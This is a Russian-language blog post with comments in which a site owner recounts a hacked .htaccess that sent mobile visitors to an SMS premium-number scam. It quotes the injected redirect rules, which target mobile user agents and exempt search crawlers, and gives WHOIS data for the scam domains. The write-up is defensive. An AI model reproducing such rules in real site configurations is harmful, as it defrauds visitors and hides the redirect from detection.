|
Тема совсем свежая. Хотел сделать запись на сайте с мобильного телефона, фиг вам, сообщение, что устарел браузер и предложение установить обновление Above для Windows Mobile. С учетом, что у меня телефон и близко не с Windows Mobile, даже я догадался, что дело нечисто, перешел по ссылке внизу, а там сообщение о платной установке:
6. Для оплаты доступа к сервису flashupd.ru, Вам необходимо произвести отправку сообщений на платные короткие номера:
Для России на сервисные номера:
8510 (~ 300 руб.);
9797 (~ 200 руб.);
7204 (~ 150 руб.);
8503 (~ 100 руб.);
7202 (~ 75 руб.);
7201 (~ 40 руб.).
Короче редирект с телефона. Приехал к стационарному компьютеру - все нормально. В коде вируса нет, начал рыть сеть, нашел форум с подробным разбором полетов:
Браузер на телефоне заблокирован СМС-мошенниками
flash_player.jar надо, безусловно сносить, это вредоносная программка по срубанию с вас денег. Но от редиректа с сайта не помогает. Читайте обсуждение на второй странице.
Ломанули .htaccess. Действительно, у меня изменился этот файл 10 июня.
вот эти строки комитим и все нормально работает, на первый взгляд (к компьютеру с бекапом и старой версией пока не добрался)
#RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk) [NC]
#RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|
pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|mmcrawler| yandexbot|yandeximages|yandexvideo|yandexmedia|
yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|
yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
#RewriteRule (.*) http://comite.ru/?1 [L,R=302] # on
Дело свежее совсем, судя по сайтам из оферы:
domain: FLASHUPD.RU
nserver: ns1.reg.ru.
nserver: ns2.reg.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGRU-REG-RIPN
admin-contact: http://www.reg.ru/whois/admin_contact
created: 2012.06.02
paid-till: 2013.06.02
free-date: 2013.07.03
source: TCI
domain: COMITE.RU
nserver: ns1.reg.ru.
nserver: ns2.reg.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
registrar: REGRU-REG-RIPN
admin-contact: http://www.reg.ru/whois/admin_contact
created: 2012.06.03
paid-till: 2013.06.03
free-date: 2013.07.04
source: TCI
Небольшое дополнение: это взлом не конкретной CRM, как сначала может показаться (в сети есть сообщения и по Drupal и по Joomla), а использована уязвимость апача.
Могу только дать ссылку на тему обсуждения по взлому .htaccess, может поможет: "Взлом через подмену htaccess"
Здравствуйте!
Хотелось бы скопировать эту статью и опубликовать у себя на сайте.
Разумеется, будет присутствовать ссылка на ваш сайт
Похоже на
Похоже на бот.
Но уже второй такой ком на эту запись, первый стер.
Копировать, ссылки давать можно.